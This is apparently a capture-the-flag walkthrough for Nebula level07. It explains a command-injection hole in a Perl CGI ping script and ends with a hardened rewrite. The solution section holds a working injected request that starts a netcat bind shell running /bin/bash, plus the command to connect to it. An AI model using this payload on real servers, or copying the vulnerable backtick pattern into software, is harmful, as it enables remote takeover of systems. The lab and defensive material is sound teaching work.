Nebula - level07 - Vulnerable HTTP Parameter Input
About
The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server. To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.
#!/usr/bin/perl
use CGI qw{param};
print "Content-type: text/html\n\n";
sub ping {
    $host = $_[0];
    print("<html><head><title>Ping results</title></head><body><pre>");
    # $host is interpolated into a backtick (shell) command as-is
    @output = `ping -c 3 $host 2>&1`;
    foreach $line (@output) { print "$line"; }
    print("</pre></body></html>");
}
# check if Host set. if not, display normal page, etc
ping(param("Host"));
Solution
The line @output = `ping -c 3 $host 2>&1`; passes unsanitized user input to a command that is executed in a shell. To craft $host into a useful parameter, consider the resulting command line ping -c 3 $IP; nc.traditional -lkp 8080 -e /bin/bash;. With this in mind, create an HTTP GET request with Host as the parameter:
wget http://127.0.0.1:7007/index.cgi?Host=\'127.0.0.1; nc.traditional -lkp 8080 -e "/bin/bash"; #\'
The port 7007 and the path to index.cgi come from /home/flag07/thttpd.conf.
Use nc 127.0.0.1 8080 to connect to the shell.
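For contrast with the vulnerable backtick line, here is a hardened variant of the same CGI. It is an added example, not part of the original level or write-up; the helper names valid_host and run_ping are hypothetical, and it assumes only IPv4 addresses and DNS names need to be pinged.

```perl
#!/usr/bin/perl
# Added example: hardened variant of the level07 ping CGI.
use strict;
use warnings;
use CGI qw{param};

# Allowlist check (assumption: only IPv4 addresses and DNS names are needed).
sub valid_host {
    my ($host) = @_;
    return 0 unless defined $host && length($host) <= 253;
    if ($host =~ /\A([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\z/) {
        return (grep { $_ > 255 } $1, $2, $3, $4) ? 0 : 1;
    }
    # Each label starts with a letter or digit, so the value can never
    # begin with "-" and be parsed by ping as an option.
    my $label = qr/[A-Za-z0-9][A-Za-z0-9-]{0,62}/;
    return $host =~ /\A$label(?:\.$label)*\z/ ? 1 : 0;
}

sub run_ping {
    my ($host) = @_;
    # Forking open: the child is a copy of this script with STDOUT piped to $out.
    my $pid = open(my $out, '-|');
    die "fork failed: $!" unless defined $pid;
    if ($pid == 0) {
        open(STDERR, '>&', \*STDOUT) or exit 126;   # same effect as 2>&1
        # List-form exec runs ping directly; no /bin/sh ever sees $host,
        # so ; | & ` $ have no special meaning.
        exec('ping', '-c', '3', $host) or exit 127;
    }
    my @output = <$out>;
    close($out);
    return @output;
}

my $host   = param("Host");
my @output = valid_host($host) ? run_ping($host) : ("Invalid host\n");

print "Content-type: text/html\n\n";
print "<html><head><title>Ping results</title></head><body><pre>";
print for @output;
print "</pre></body></html>";
```

Either control alone closes the injection: the allowlist rejects the request used in the solution, and the list-form exec would hand the whole string to ping as a single argument instead of to a shell.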